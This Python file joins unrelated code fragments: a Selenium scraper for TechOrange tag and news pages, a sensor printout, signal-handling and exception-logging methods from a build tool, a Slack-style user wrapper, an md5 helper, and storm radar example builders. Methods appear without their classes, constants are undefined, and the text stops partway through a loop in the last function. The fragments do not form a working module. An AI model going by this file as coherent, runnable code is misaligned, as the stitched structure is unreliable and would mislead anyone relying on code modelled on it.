def initDriver(self):
    if self.driver is None:
        self.driver = self.getDriver()

def quitDriver(self):
    self.driver.quit()
    self.driver = None

def runSpider(self, lstSubcommand=None):
    strSubcommand = lstSubcommand[0]
    strArg1 = None
    if len(lstSubcommand) == 2:
        strArg1 = lstSubcommand[1]
    self.initDriver()  # init selenium driver
    self.dicSubCommandHandler[strSubcommand](strArg1)
    self.quitDriver()  # quit selenium driver

def downloadIndexPage(self, uselessArg1=None):
    logging.info("download index page")
    strIndexHtmlFolderPath = self.SOURCE_HTML_BASE_FOLDER_PATH + u"\\TECHORANGE"
    if not os.path.exists(strIndexHtmlFolderPath):
        os.mkdir(strIndexHtmlFolderPath)  # mkdir source_html/TECHORANGE/
    # TechOrange homepage
    self.driver.get("https://buzzorange.com/techorange/")
    # save the html
    strIndexHtmlFilePath = strIndexHtmlFolderPath + u"\\index.html"
    self.utility.overwriteSaveAs(strFilePath=strIndexHtmlFilePath,
                                 unicodeData=self.driver.page_source)

def downloadTagPag(self, uselessArg1=None):
    logging.info("download tag page")
    strTagHtmlFolderPath = self.SOURCE_HTML_BASE_FOLDER_PATH + u"\\TECHORANGE\\tag"
    if not os.path.exists(strTagHtmlFolderPath):
        os.mkdir(strTagHtmlFolderPath)  # mkdir source_html/TECHORANGE/tag/
    strTagWebsiteDomain = self.strWebsiteDomain + u"/tag"
    # fetch the tag names that have not been downloaded yet from the DB
    lstStrNotObtainedTagName = self.db.fetchallNotObtainedTagName()
    for strNotObtainedTagName in lstStrNotObtainedTagName:
        # skip tags whose names are too long
        if len(strNotObtainedTagName) > 60:
            continue
        strTagUrl = strTagWebsiteDomain + u"/" + strNotObtainedTagName
        # page 0 of the tag
        intPageNum = 0
        time.sleep(random.randint(2, 5))  # sleep a random time
        self.driver.get(strTagUrl)
        # save the html
        strTagHtmlFilePath = strTagHtmlFolderPath + u"\\%d_%s_tag.html" % (
            intPageNum, strNotObtainedTagName)
        self.utility.overwriteSaveAs(strFilePath=strTagHtmlFilePath,
                                     unicodeData=self.driver.page_source)
        # next page of the tag
        elesNextPageA = self.driver.find_elements_by_css_selector(
            "div.nav-links a.next.page-numbers")
        while len(elesNextPageA) != 0:
            time.sleep(random.randint(2, 5))  # sleep a random time
            intPageNum = intPageNum + 1
            strTagUrl = elesNextPageA[0].get_attribute("href")
            self.driver.get(strTagUrl)
            # save the html
            strTagHtmlFilePath = strTagHtmlFolderPath + u"\\%d_%s_tag.html" % (
                intPageNum, strNotObtainedTagName)
            self.utility.overwriteSaveAs(strFilePath=strTagHtmlFilePath,
                                         unicodeData=self.driver.page_source)
            # page after that
            elesNextPageA = self.driver.find_elements_by_css_selector(
                "div.nav-links a.next.page-numbers")
        # mark the tag as fetched in the DB (isGot = 1)
        self.db.updateTagStatusIsGot(strTagName=strNotObtainedTagName)
        logging.info("got tag %s" % strNotObtainedTagName)

def limitStrLessThen128Char(self, strStr=None):
    if len(strStr) > 128:
        logging.info("limit str to less than 128 chars")
        return strStr[:127] + u"_"
    else:
        return strStr

def downloadNewsPage(self, strTagName=None):
    if strTagName is None:
        # no tag specified: walk every fully obtained tag
        lstStrObtainedTagName = self.db.fetchallCompletedObtainedTagName()
        for strObtainedTagName in lstStrObtainedTagName:
            self.downloadNewsPageWithGivenTagName(strTagName=strObtainedTagName)
    else:
        # a tag name was specified
        self.downloadNewsPageWithGivenTagName(strTagName=strTagName)

def downloadNewsPageWithGivenTagName(self, strTagName=None):
    logging.info("download news page with tag %s" % strTagName)
    strNewsHtmlFolderPath = self.SOURCE_HTML_BASE_FOLDER_PATH + u"\\TECHORANGE\\news"
    if not os.path.exists(strNewsHtmlFolderPath):
        os.mkdir(strNewsHtmlFolderPath)  # mkdir source_html/TECHORANGE/news/
    # fetch the news urls recorded in the DB for the given tag
    lstStrNewsUrl = self.db.fetchallNewsUrlByTagName(strTagName=strTagName)
    intDownloadedNewsCount = 0  # number of downloaded news pages
    timeStart = time.time()  # timing start point
    timeEnd = None  # timing end point
    for strNewsUrl in lstStrNewsUrl:
        # check whether the page was already downloaded
        if not self.db.checkNewsIsGot(strNewsUrl=strNewsUrl):
            if intDownloadedNewsCount % 10 == 0:
                # measure the time spent downloading 10 news pages
                timeEnd = time.time()
                timeCost = timeEnd - timeStart
                logging.info("download 10 news cost %f sec" % timeCost)
                timeStart = timeEnd
            intDownloadedNewsCount = intDownloadedNewsCount + 1
            time.sleep(random.randint(2, 5))  # sleep a random time
            self.driver.get(strNewsUrl)
            # save the html
            strNewsName = re.match(
                "^https://buzzorange.com/techorange/[\d]{4}/[\d]{2}/[\d]{2}/(.*)/$",
                strNewsUrl).group(1)
            # shorten the name to fewer than 128 characters
            strNewsName = self.limitStrLessThen128Char(strStr=strNewsName)
            strNewsHtmlFilePath = strNewsHtmlFolderPath + u"\\%s_news.html" % strNewsName
            self.utility.overwriteSaveAs(strFilePath=strNewsHtmlFilePath,
                                         unicodeData=self.driver.page_source)
            # mark the news as fetched in the DB (isGot = 1)
            self.db.updateNewsStatusIsGot(strNewsUrl=strNewsUrl)

def write():
    try:
        p = round(weather.pressure(), 2)
        c = light.light()
        print('{"light": ' + str(c) + ', "pressure": ' + str(p) + ' }')
    except KeyboardInterrupt:
        pass

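# Hedged usage sketch for write() above: the calls suggest Pimoroni's envirophat
# library (`weather.pressure()`, `light.light()`), which is an assumption, not
# stated in the source.  One JSON line is printed per second:
if __name__ == "__main__":
    import time
    from envirophat import light, weather  # assumed dependency

    while True:
        write()  # prints e.g. {"light": 312, "pressure": 1013.25 }
        time.sleep(1)
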
@property
def signal_handler_mapping(self):
    """A dict mapping (signal number) -> (a method handling the signal)."""
    # Could use an enum here, but we never end up doing any matching on the
    # specific signal value, instead just iterating over the registered signals
    # to set handlers, so a dict is probably better.
    return {
        signal.SIGINT: self._handle_sigint_if_enabled,
        signal.SIGQUIT: self.handle_sigquit,
        signal.SIGTERM: self.handle_sigterm,
    }

def __init__(self):
    self._ignore_sigint_lock = threading.Lock()
    self._threads_ignoring_sigint = 0
    self._ignoring_sigint_v2_engine = False

def _check_sigint_gate_is_correct(self):
    assert (
        self._threads_ignoring_sigint >= 0
    ), "This should never happen, someone must have modified the counter outside of SignalHandler."

def _handle_sigint_if_enabled(self, signum, _frame):
    with self._ignore_sigint_lock:
        self._check_sigint_gate_is_correct()
        threads_ignoring_sigint = self._threads_ignoring_sigint
        ignoring_sigint_v2_engine = self._ignoring_sigint_v2_engine
    if threads_ignoring_sigint == 0 and not ignoring_sigint_v2_engine:
        self.handle_sigint(signum, _frame)

def _toggle_ignoring_sigint_v2_engine(self, toggle: bool):
    with self._ignore_sigint_lock:
        self._ignoring_sigint_v2_engine = toggle

@contextmanager
def _ignoring_sigint(self):
    # Restored as a context manager: ignoring_sigint() below uses this method
    # in a `with` statement, and the body yields.
    with self._ignore_sigint_lock:
        self._check_sigint_gate_is_correct()
        self._threads_ignoring_sigint += 1
    try:
        yield
    finally:
        with self._ignore_sigint_lock:
            self._threads_ignoring_sigint -= 1
            self._check_sigint_gate_is_correct()

def handle_sigint(self, signum, _frame):
    raise KeyboardInterrupt("User interrupted execution with control-c!")

def __init__(self, signum, signame):
    self.signum = signum
    self.signame = signame
    self.traceback_lines = traceback.format_stack()
    super(SignalHandler.SignalHandledNonLocalExit, self).__init__()

def handle_sigquit(self, signum, _frame):
    raise self.SignalHandledNonLocalExit(signum, "SIGQUIT")

def handle_sigterm(self, signum, _frame):
    raise self.SignalHandledNonLocalExit(signum, "SIGTERM")

def __new__(cls, *args, **kwargs):
    raise TypeError("Instances of {} are not allowed to be constructed!".format(cls.__name__))

@classmethod
def reset_should_print_backtrace_to_terminal(cls, should_print_backtrace):
    """Set whether a backtrace gets printed to the terminal error stream on a fatal error.

    Class state:
    - Overwrites `cls._should_print_backtrace_to_terminal`.
    """
    cls._should_print_backtrace_to_terminal = should_print_backtrace

@classmethod
def reset_log_location(cls, new_log_location: str) -> None:
    """Re-acquire file handles to error logs based in the new location.

    Class state:
    - Overwrites `cls._log_dir`, `cls._pid_specific_error_fileobj`, and
      `cls._shared_error_fileobj`.
    OS state:
    - May create a new directory.
    - Overwrites signal handlers for many fatal and non-fatal signals (but not SIGUSR2).

    :raises: :class:`ExceptionSink.ExceptionSinkError` if the directory does not exist or
             is not writable.
    """
    # We could no-op here if the log locations are the same, but there's no reason not to
    # have the additional safety of re-acquiring file descriptors each time (and erroring
    # out early if the location is no longer writable).
    try:
        safe_mkdir(new_log_location)
    except Exception as e:
        raise cls.ExceptionSinkError(
            "The provided log location path at '{}' is not writable or could not be created: {}.".format(
                new_log_location, str(e)
            ),
            e,
        )

    pid = os.getpid()
    pid_specific_log_path = cls.exceptions_log_path(for_pid=pid, in_dir=new_log_location)
    shared_log_path = cls.exceptions_log_path(in_dir=new_log_location)
    assert pid_specific_log_path != shared_log_path
    try:
        pid_specific_error_stream = safe_open(pid_specific_log_path, mode="w")
        shared_error_stream = safe_open(shared_log_path, mode="a")
    except Exception as e:
        raise cls.ExceptionSinkError(
            "Error opening fatal error log streams for log location '{}': {}".format(
                new_log_location, str(e)
            )
        )

    # NB: mutate process-global state!
    if faulthandler.is_enabled():
        logger.debug("re-enabling faulthandler")
        # Call Py_CLEAR() on the previous error stream:
        # https://github.com/vstinner/faulthandler/blob/master/faulthandler.c
        faulthandler.disable()
    # Send a stacktrace to this file if interrupted by a fatal error.
    faulthandler.enable(file=pid_specific_error_stream, all_threads=True)

    # NB: mutate the class variables!
    cls._log_dir = new_log_location
    cls._pid_specific_error_fileobj = pid_specific_error_stream
    cls._shared_error_fileobj = shared_error_stream

def _exiter(self) -> Optional[Exiter]:
    return ExceptionSink.get_global_exiter()

@classmethod
def get_global_exiter(cls) -> Optional[Exiter]:
    return cls._exiter

@classmethod
@contextmanager
def exiter_as(cls, new_exiter_fun: Callable[[Optional[Exiter]], Exiter]) -> Iterator[None]:
    """Temporarily override the global exiter.

    NB: We don't want to try/finally here, because we want exceptions to propagate
    with the most recent exiter installed in sys.excepthook.
    If we wrap this in a try:finally, exceptions will be caught and exiters unset.
    """
    previous_exiter = cls._exiter
    new_exiter = new_exiter_fun(previous_exiter)
    cls._reset_exiter(new_exiter)
    yield
    cls._reset_exiter(previous_exiter)

@classmethod
@contextmanager
def exiter_as_until_exception(
    cls, new_exiter_fun: Callable[[Optional[Exiter]], Exiter]
) -> Iterator[None]:
    """Temporarily override the global exiter, except this will unset it when an exception
    happens."""
    previous_exiter = cls._exiter
    new_exiter = new_exiter_fun(previous_exiter)
    try:
        cls._reset_exiter(new_exiter)
        yield
    finally:
        cls._reset_exiter(previous_exiter)

@classmethod
def _reset_exiter(cls, exiter: Optional[Exiter]) -> None:
    """Class state:
    - Overwrites `cls._exiter`.
    Python state:
    - Overwrites sys.excepthook.
    """
    logger.debug(f"overriding the global exiter with {exiter} (from {cls._exiter})")
    # NB: mutate the class variables! This is done before mutating the exception hook,
    # because the uncaught exception handler uses cls._exiter to exit.
    cls._exiter = exiter
    # NB: mutate process-global state!
    sys.excepthook = cls._log_unhandled_exception_and_exit

@classmethod
def reset_interactive_output_stream(
    cls, interactive_output_stream, override_faulthandler_destination=True
):
    """Class state:
    - Overwrites `cls._interactive_output_stream`.
    OS state:
    - Overwrites the SIGUSR2 handler.

    This method registers a SIGUSR2 handler, which permits a non-fatal
    `kill -31 <pants pid>` for stacktrace retrieval. This is also where the error
    message on fatal exit will be printed to.
    """
    try:
        # NB: mutate process-global state!
        # This permits a non-fatal `kill -31 <pants pid>` for stacktrace retrieval.
        if override_faulthandler_destination:
            faulthandler.register(
                signal.SIGUSR2, interactive_output_stream, all_threads=True, chain=False
            )
        # NB: mutate the class variables!
        cls._interactive_output_stream = interactive_output_stream
    except ValueError:
        # Warn about "ValueError: IO on closed file" when the stream is closed.
        cls.log_exception(
            "Cannot reset interactive_output_stream -- stream (probably stderr) is closed"
        )

@classmethod
def exceptions_log_path(cls, for_pid=None, in_dir=None):
    """Get the path to either the shared or pid-specific fatal errors log file."""
    if for_pid is None:
        intermediate_filename_component = ""
    else:
        assert isinstance(for_pid, Pid)
        intermediate_filename_component = ".{}".format(for_pid)
    in_dir = in_dir or cls._log_dir
    return os.path.join(
        in_dir, ".pids", "exceptions{}.log".format(intermediate_filename_component)
    )

@classmethod
def log_exception(cls, msg):
    """Try to log an error message to this process's error log and the shared error log.

    NB: Doesn't raise (logs an error instead).
    """
    pid = os.getpid()
    fatal_error_log_entry = cls._format_exception_message(msg, pid)

    # We care more about this log than the shared log, so write to it first.
    try:
        cls._try_write_with_flush(cls._pid_specific_error_fileobj, fatal_error_log_entry)
    except Exception as e:
        logger.error(
            "Error logging the message '{}' to the pid-specific file handle for {} at pid {}:\n{}".format(
                msg, cls._log_dir, pid, e
            )
        )

    # Write to the shared log.
    try:
        # TODO: we should probably guard this against concurrent modification by other
        # pants subprocesses somehow.
        cls._try_write_with_flush(cls._shared_error_fileobj, fatal_error_log_entry)
    except Exception as e:
        logger.error(
            "Error logging the message '{}' to the shared file handle for {} at pid {}:\n{}".format(
                msg, cls._log_dir, pid, e
            )
        )

@classmethod
def _try_write_with_flush(cls, fileobj, payload):
    """This method is here so that it can be patched to simulate write errors.

    This is because mock can't patch primitive objects like file objects.
    """
    fileobj.write(payload)
    fileobj.flush()

@classmethod
def reset_signal_handler(cls, signal_handler):
    """Class state:
    - Overwrites `cls._signal_handler`.
    OS state:
    - Overwrites signal handlers for SIGINT, SIGQUIT, and SIGTERM.

    NB: This method calls signal.signal(), which will crash if not called from the main
    thread!

    :returns: The :class:`SignalHandler` that was previously registered, or None if this
              is the first time this method was called.
    """
    assert isinstance(signal_handler, SignalHandler)
    # NB: Modify process-global state!
    for signum, handler in signal_handler.signal_handler_mapping.items():
        signal.signal(signum, handler)
        # Retry any system calls interrupted by any of the signals we just installed
        # handlers for (instead of having them raise EINTR). siginterrupt(3) says this
        # is the default behavior on Linux and OSX.
        signal.siginterrupt(signum, False)

    previous_signal_handler = cls._signal_handler
    # NB: Mutate the class variables!
    cls._signal_handler = signal_handler
    return previous_signal_handler

@classmethod
@contextmanager
def trapped_signals(cls, new_signal_handler):
    """A contextmanager which temporarily overrides signal handling.

    NB: This method calls signal.signal(), which will crash if not called from the main
    thread!
    """
    previous_signal_handler = cls.reset_signal_handler(new_signal_handler)
    try:
        yield
    finally:
        cls.reset_signal_handler(previous_signal_handler)

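# Hedged usage sketch for trapped_signals() above, assuming the enclosing class
# is an ExceptionSink-style holder and SignalHandler is the class whose methods
# appear earlier in this section (`run_main_loop` is a placeholder, not a real
# API):
#
#   with ExceptionSink.trapped_signals(SignalHandler()):
#       run_main_loop()  # SIGINT/SIGQUIT/SIGTERM are routed to the handler here
#   # the previous handlers are restored on exit, even if the body raises
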
@classmethod
@contextmanager
def ignoring_sigint(cls):
    """A contextmanager which disables handling sigint in the current signal handler.

    This allows threads that are not the main thread to ignore sigint.

    NB: Only use this if you can't use ExceptionSink.trapped_signals().

    Class state:
    - Toggles `self._ignore_sigint` in `cls._signal_handler`.
    """
    with cls._signal_handler._ignoring_sigint():
        yield

@classmethod
def toggle_ignoring_sigint_v2_engine(cls, toggle: bool) -> None:
    assert cls._signal_handler is not None
    cls._signal_handler._toggle_ignoring_sigint_v2_engine(toggle)

@classmethod
def _iso_timestamp_for_now(cls):
    return datetime.datetime.now().isoformat()

@classmethod
def _format_exception_message(cls, msg, pid):
    return cls._EXCEPTION_LOG_FORMAT.format(
        timestamp=cls._iso_timestamp_for_now(),
        process_title=setproctitle.getproctitle(),
        args=sys.argv,
        pid=pid,
        message=msg,
    )

@classmethod
def _format_traceback(cls, traceback_lines, should_print_backtrace):
    if should_print_backtrace:
        traceback_string = "\n{}".format("".join(traceback_lines))
    else:
        traceback_string = " {}".format(cls._traceback_omitted_default_text)
    return traceback_string

@classmethod
def _format_unhandled_exception_log(cls, exc, tb, add_newline, should_print_backtrace):
    exc_type = type(exc)
    exception_full_name = "{}.{}".format(exc_type.__module__, exc_type.__name__)
    exception_message = str(exc) if exc else "(no message)"
    maybe_newline = "\n" if add_newline else ""
    return cls._UNHANDLED_EXCEPTION_LOG_FORMAT.format(
        exception_type=exception_full_name,
        backtrace=cls._format_traceback(
            traceback_lines=traceback.format_tb(tb),
            should_print_backtrace=should_print_backtrace,
        ),
        exception_message=exception_message,
        maybe_newline=maybe_newline,
    )

@classmethod
def _exit_with_failure(cls, terminal_msg):
    timestamp_msg = (
        f"timestamp: {cls._iso_timestamp_for_now()}\n"
        if cls._should_print_backtrace_to_terminal
        else ""
    )
    details_msg = (
        ""
        if cls._should_print_backtrace_to_terminal
        else "\n\n(Use --print-exception-stacktrace to see more error details.)"
    )
    terminal_msg = terminal_msg or "<no exit reason provided>"
    formatted_terminal_msg = cls._EXIT_FAILURE_TERMINAL_MESSAGE_FORMAT.format(
        timestamp_msg=timestamp_msg, terminal_msg=terminal_msg, details_msg=details_msg
    )
    # Exit with failure, printing a message to the terminal (or whatever the interactive
    # stream is).
    cls._exiter.exit_and_fail(msg=formatted_terminal_msg, out=cls._interactive_output_stream)

@classmethod
def _log_unhandled_exception_and_exit(
    cls, exc_class=None, exc=None, tb=None, add_newline=False
):
    """A sys.excepthook implementation which logs the error and exits with failure."""
    exc_class = exc_class or sys.exc_info()[0]
    exc = exc or sys.exc_info()[1]
    tb = tb or sys.exc_info()[2]

    # This exception was raised by a signal handler with the intent to exit the program.
    if exc_class == SignalHandler.SignalHandledNonLocalExit:
        return cls._handle_signal_gracefully(exc.signum, exc.signame, exc.traceback_lines)

    extra_err_msg = None
    try:
        # Always output the unhandled exception details into a log file, including the
        # traceback.
        exception_log_entry = cls._format_unhandled_exception_log(
            exc, tb, add_newline, should_print_backtrace=True
        )
        cls.log_exception(exception_log_entry)
    except Exception as e:
        extra_err_msg = "Additional error logging unhandled exception {}: {}".format(exc, e)
        logger.error(extra_err_msg)

    # Generate an unhandled exception report fit to be printed to the terminal (respecting
    # the Exiter's should_print_backtrace field).
    if cls._should_print_backtrace_to_terminal:
        stderr_printed_error = cls._format_unhandled_exception_log(
            exc, tb, add_newline,
            should_print_backtrace=cls._should_print_backtrace_to_terminal
        )
        if extra_err_msg:
            stderr_printed_error = "{}\n{}".format(stderr_printed_error, extra_err_msg)
    else:
        # If the user didn't ask for a backtrace, show a succinct error message without
        # all the exception-related preamble.  A power-user/pants developer can still
        # get all the preamble info along with the backtrace, but the end user shouldn't
        # see that boilerplate by default.
        error_msgs = getattr(exc, "end_user_messages", lambda: [str(exc)])()
        stderr_printed_error = "\n" + "\n".join(f"ERROR: {msg}" for msg in error_msgs)

    cls._exit_with_failure(stderr_printed_error)

@classmethod
def _handle_signal_gracefully(cls, signum, signame, traceback_lines):
    """Signal handler for non-fatal signals which raises or logs an error and exits with
    failure."""
    # Extract the stack, and format an entry to be written to the exception log.
    formatted_traceback = cls._format_traceback(
        traceback_lines=traceback_lines, should_print_backtrace=True
    )
    signal_error_log_entry = cls._CATCHABLE_SIGNAL_ERROR_LOG_FORMAT.format(
        signum=signum, signame=signame, formatted_traceback=formatted_traceback
    )
    # TODO: determine the appropriate signal-safe behavior here (to avoid writing to our
    # file descriptors re-entrantly, which raises an IOError).
    # This method catches any exceptions raised within it.
    cls.log_exception(signal_error_log_entry)

    # Create a potentially-abbreviated traceback for the terminal or other interactive
    # stream.
    formatted_traceback_for_terminal = cls._format_traceback(
        traceback_lines=traceback_lines,
        should_print_backtrace=cls._should_print_backtrace_to_terminal,
    )
    terminal_log_entry = cls._CATCHABLE_SIGNAL_ERROR_LOG_FORMAT.format(
        signum=signum, signame=signame,
        formatted_traceback=formatted_traceback_for_terminal
    )
    # Exit, printing the output to the terminal.
    cls._exit_with_failure(terminal_log_entry)

def __init__(self, raw_data):
    self._raw = raw_data

def __getitem__(self, key):
    return self._raw[key]

def display_name(self):
    """Find the most appropriate display name for a user: look for a "display_name",
    then a "real_name", and finally fall back to the always-present "name"."""
    for k in self._NAME_KEYS:
        if self._raw.get(k):
            return self._raw[k]
        if "profile" in self._raw and self._raw["profile"].get(k):
            return self._raw["profile"][k]
    return self._raw["name"]

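# Illustrative sketch for display_name() above (assumption: _NAME_KEYS is
# something like ("display_name", "real_name"), per the docstring).  A
# Slack-style user record such as
#
#   {"name": "jdoe", "profile": {"display_name": "Jane", "real_name": "Jane Doe"}}
#
# resolves to "Jane"; with an empty profile it falls back to "jdoe".
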
@property
def email(self):
    """Shortcut property for finding the e-mail address or bot URL."""
    if "profile" in self._raw:
        email = self._raw["profile"].get("email")
    elif "bot_url" in self._raw:
        email = self._raw["bot_url"]
    else:
        email = None
    if not email:
        logging.debug("No email found for %s", self._raw.get("name"))
    return email

def image_url(self, pixel_size=None):
    """Get the URL for the user icon in the desired pixel size, if it exists.

    If no size is supplied, give the URL for the full-size image.
    """
    if "profile" not in self._raw:
        return
    profile = self._raw["profile"]
    if pixel_size:
        img_key = "image_%s" % pixel_size
        if img_key in profile:
            return profile[img_key]
    return profile[self._DEFAULT_IMAGE_KEY]

def md5(fname):
    hash_md5 = hashlib.md5()
    with open(fname, "rb") as f:
        for chunk in iter(lambda: f.read(4096), b""):
            hash_md5.update(chunk)
    return hash_md5.hexdigest()

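# Runnable check for md5() above, using the well-known digest of b"abc"
# (the scratch file name is illustrative, not from the source):
import hashlib  # md5() above also relies on this import

if __name__ == "__main__":
    with open("scratch.bin", "wb") as f:
        f.write(b"abc")
    assert md5("scratch.bin") == "900150983cd24fb0d6963f7d28e17f72"
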
def _read_soundings(sounding_file_name, sounding_field_names, radar_image_dict):
    """Reads storm-centered soundings and matches them with storm-centered radar images.

    :param sounding_file_name: Path to input file (will be read by
        `soundings.read_soundings`).
    :param sounding_field_names: See doc for `soundings.read_soundings`.
    :param radar_image_dict: Dictionary created by
        `storm_images.read_storm_images`.
    :return: sounding_dict: Dictionary created by `soundings.read_soundings`.
    :return: radar_image_dict: Same as input, but excluding storm objects with
        no sounding.
    """

    print('Reading data from: "{0:s}"...'.format(sounding_file_name))
    sounding_dict, _ = soundings.read_soundings(
        netcdf_file_name=sounding_file_name,
        field_names_to_keep=sounding_field_names,
        full_id_strings_to_keep=radar_image_dict[storm_images.FULL_IDS_KEY],
        init_times_to_keep_unix_sec=radar_image_dict[
            storm_images.VALID_TIMES_KEY]
    )

    num_examples_with_soundings = len(sounding_dict[soundings.FULL_IDS_KEY])
    if num_examples_with_soundings == 0:
        return None, None

    radar_full_id_strings = numpy.array(
        radar_image_dict[storm_images.FULL_IDS_KEY]
    )
    orig_storm_times_unix_sec = (
        radar_image_dict[storm_images.VALID_TIMES_KEY] + 0
    )

    indices_to_keep = []

    for i in range(num_examples_with_soundings):
        this_index = numpy.where(numpy.logical_and(
            radar_full_id_strings == sounding_dict[soundings.FULL_IDS_KEY][i],
            orig_storm_times_unix_sec ==
            sounding_dict[soundings.INITIAL_TIMES_KEY][i]
        ))[0][0]

        indices_to_keep.append(this_index)

    indices_to_keep = numpy.array(indices_to_keep, dtype=int)

    radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY] = radar_image_dict[
        storm_images.STORM_IMAGE_MATRIX_KEY
    ][indices_to_keep, ...]

    radar_image_dict[storm_images.FULL_IDS_KEY] = sounding_dict[
        soundings.FULL_IDS_KEY
    ]
    radar_image_dict[storm_images.VALID_TIMES_KEY] = sounding_dict[
        soundings.INITIAL_TIMES_KEY
    ]

    return sounding_dict, radar_image_dict

def chunkstring(s, n):
    # range() here (Python 3); the original used Python 2's xrange().
    return [s[i:i + n] for i in range(0, len(s), n)]

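# Runnable example for chunkstring() above:
if __name__ == "__main__":
    assert chunkstring("abcdefg", 3) == ["abc", "def", "g"]
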
def _create_2d_examples(
        radar_file_names, full_id_strings, storm_times_unix_sec,
        target_matrix, sounding_file_name=None, sounding_field_names=None):
    """Creates 2-D examples for one file time.

    E = number of desired examples (storm objects)
    e = number of examples returned
    T = number of target variables

    :param radar_file_names: length-C list of paths to storm-centered radar
        images.  Files will be read by `storm_images.read_storm_images`.
    :param full_id_strings: length-E list with full IDs of storm objects to
        return.
    :param storm_times_unix_sec: length-E numpy array with valid times of storm
        objects to return.
    :param target_matrix: E-by-T numpy array of target values (integer class
        labels).
    :param sounding_file_name: Path to sounding file (will be read by
        `soundings.read_soundings`).  If `sounding_file_name is None`, examples
        will not include soundings.
    :param sounding_field_names: See doc for `soundings.read_soundings`.
    :return: example_dict: Same as input for `write_example_file`, but without
        key "target_names".
    """

    orig_full_id_strings = copy.deepcopy(full_id_strings)
    orig_storm_times_unix_sec = storm_times_unix_sec + 0

    print('Reading data from: "{0:s}"...'.format(radar_file_names[0]))
    this_radar_image_dict = storm_images.read_storm_images(
        netcdf_file_name=radar_file_names[0],
        full_id_strings_to_keep=full_id_strings,
        valid_times_to_keep_unix_sec=storm_times_unix_sec)

    if this_radar_image_dict is None:
        return None

    if sounding_file_name is None:
        sounding_matrix = None
        sounding_field_names = None
        sounding_heights_m_agl = None
    else:
        sounding_dict, this_radar_image_dict = _read_soundings(
            sounding_file_name=sounding_file_name,
            sounding_field_names=sounding_field_names,
            radar_image_dict=this_radar_image_dict)

        if this_radar_image_dict is None:
            return None
        if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0:
            return None

        sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY]
        sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY]
        sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY]

    full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY]
    storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY]

    these_indices = tracking_utils.find_storm_objects(
        all_id_strings=orig_full_id_strings,
        all_times_unix_sec=orig_storm_times_unix_sec,
        id_strings_to_keep=full_id_strings,
        times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False)

    target_matrix = target_matrix[these_indices, :]

    num_channels = len(radar_file_names)
    tuple_of_image_matrices = ()

    for j in range(num_channels):
        if j != 0:
            print('Reading data from: "{0:s}"...'.format(radar_file_names[j]))
            this_radar_image_dict = storm_images.read_storm_images(
                netcdf_file_name=radar_file_names[j],
                full_id_strings_to_keep=full_id_strings,
                valid_times_to_keep_unix_sec=storm_times_unix_sec)

        tuple_of_image_matrices += (
            this_radar_image_dict[storm_images.STORM_IMAGE_MATRIX_KEY],
        )

    radar_field_names = [
        storm_images.image_file_name_to_field(f) for f in radar_file_names
    ]
    radar_heights_m_agl = numpy.array(
        [storm_images.image_file_name_to_height(f) for f in radar_file_names],
        dtype=int
    )

    example_dict = {
        FULL_IDS_KEY: full_id_strings,
        STORM_TIMES_KEY: storm_times_unix_sec,
        RADAR_FIELDS_KEY: radar_field_names,
        RADAR_HEIGHTS_KEY: radar_heights_m_agl,
        ROTATED_GRIDS_KEY:
            this_radar_image_dict[storm_images.ROTATED_GRIDS_KEY],
        ROTATED_GRID_SPACING_KEY:
            this_radar_image_dict[storm_images.ROTATED_GRID_SPACING_KEY],
        RADAR_IMAGE_MATRIX_KEY: dl_utils.stack_radar_fields(
            tuple_of_image_matrices),
        TARGET_MATRIX_KEY: target_matrix
    }

    if sounding_file_name is not None:
        example_dict.update({
            SOUNDING_FIELDS_KEY: sounding_field_names,
            SOUNDING_HEIGHTS_KEY: sounding_heights_m_agl,
            SOUNDING_MATRIX_KEY: sounding_matrix
        })

    return example_dict

def __init__(self, key):
    self.bs = 32
    self.key = hashlib.sha256(key.encode()).digest()

def _create_3d_examples(
        radar_file_name_matrix, full_id_strings, storm_times_unix_sec,
        target_matrix, sounding_file_name=None, sounding_field_names=None):
    """Creates 3-D examples for one file time.

    :param radar_file_name_matrix: numpy array (F_r x H_r) of paths to storm-
        centered radar images.  Files will be read by
        `storm_images.read_storm_images`.
    :param full_id_strings: See doc for `_create_2d_examples`.
    :param storm_times_unix_sec: Same.
    :param target_matrix: Same.
    :param sounding_file_name: Same.
    :param sounding_field_names: Same.
    :return: example_dict: Same.
    """

    orig_full_id_strings = copy.deepcopy(full_id_strings)
    orig_storm_times_unix_sec = storm_times_unix_sec + 0

    print('Reading data from: "{0:s}"...'.format(radar_file_name_matrix[0, 0]))
    this_radar_image_dict = storm_images.read_storm_images(
        netcdf_file_name=radar_file_name_matrix[0, 0],
        full_id_strings_to_keep=full_id_strings,
        valid_times_to_keep_unix_sec=storm_times_unix_sec)

    if this_radar_image_dict is None:
        return None

    if sounding_file_name is None:
        sounding_matrix = None
        sounding_field_names = None
        sounding_heights_m_agl = None
    else:
        sounding_dict, this_radar_image_dict = _read_soundings(
            sounding_file_name=sounding_file_name,
            sounding_field_names=sounding_field_names,
            radar_image_dict=this_radar_image_dict)

        if this_radar_image_dict is None:
            return None
        if len(this_radar_image_dict[storm_images.FULL_IDS_KEY]) == 0:
            return None

        sounding_matrix = sounding_dict[soundings.SOUNDING_MATRIX_KEY]
        sounding_field_names = sounding_dict[soundings.FIELD_NAMES_KEY]
        sounding_heights_m_agl = sounding_dict[soundings.HEIGHT_LEVELS_KEY]

    full_id_strings = this_radar_image_dict[storm_images.FULL_IDS_KEY]
    storm_times_unix_sec = this_radar_image_dict[storm_images.VALID_TIMES_KEY]

    these_indices = tracking_utils.find_storm_objects(
        all_id_strings=orig_full_id_strings,
        all_times_unix_sec=orig_storm_times_unix_sec,
        id_strings_to_keep=full_id_strings,
        times_to_keep_unix_sec=storm_times_unix_sec, allow_missing=False)

    target_matrix = target_matrix[these_indices, :]

    num_radar_fields = radar_file_name_matrix.shape[0]
    num_radar_heights = radar_file_name_matrix.shape[1]
    tuple_of_4d_image_matrices = ()

    for k in range(num_radar_heights):
        tuple_of_3d_image_matrices = ()

        for j in range(num_radar_fields):
            if not j == k == 0:
                print('Reading data from: "{0:s}"...'.format(
                    radar_file_name_matrix[j, k]
                ))
